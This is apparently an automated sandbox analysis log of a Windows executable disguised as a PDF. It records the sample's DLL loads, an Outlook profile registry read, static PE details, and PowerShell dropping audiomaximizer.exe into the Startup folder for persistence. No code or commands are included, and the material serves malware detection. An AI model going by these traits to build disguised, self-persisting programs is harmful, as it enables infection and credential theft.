Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: windowscodecs.dll

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: OK
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: OK
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Automated click: Continue

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PDF-3093900299039 pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PDF-3093900299039 pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: PDF-3093900299039 pdf.exe, 00000000.00000002.4131470172.0000000002821000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000000.00000002.4158359393.0000000005060000.00000004.08000000.00040000.00000000.sdmp, audiomaximizer.exe, 00000005.00000002.4134302304.00000000030C1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: PDF-3093900299039 pdf.exe, 00000003.00000002.4173710615.0000000006C6A000.00000004.00000020.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4172276540.0000000006A26000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: PDF-3093900299039 pdf.exe, 00000003.00000002.4173710615.0000000006C6A000.00000004.00000020.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4172276540.0000000006A26000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: PDF-3093900299039 pdf.exe, 00000003.00000002.4173710615.0000000006C6A000.00000004.00000020.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4172276540.0000000006A26000.00000004.00000020.00020000.00000000.sdmp

Source: PDF-3093900299039 pdf.exe

Static PE information: 0xF79C3086 [Tue Aug 23 02:46:30 2101 UTC]

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_06CE8620 push esp; retf	0_2_06CE8621
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_06CE8C98 pushfd ; iretd	0_2_06CE8CA1
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 0_2_06CE8C12 push eax; iretd	0_2_06CE8C19
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Code function: 3_2_076132F7 push ebp; iretd	3_2_076132F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_016868F1 push 00000001h; ret	8_2_01686900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_073F32F7 push ebp; iretd	8_2_073F32F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Code function: 8_2_073F594F push es; ret	8_2_073F5950

Source: PDF-3093900299039 pdf.exe	Static PE information: section name: .text entropy: 7.290668751533855
Source: audiomaximizer.exe.1.dr	Static PE information: section name: .text entropy: 7.290668751533855

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe\:Zone.Identifier:$DATA			Jump to behavior

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
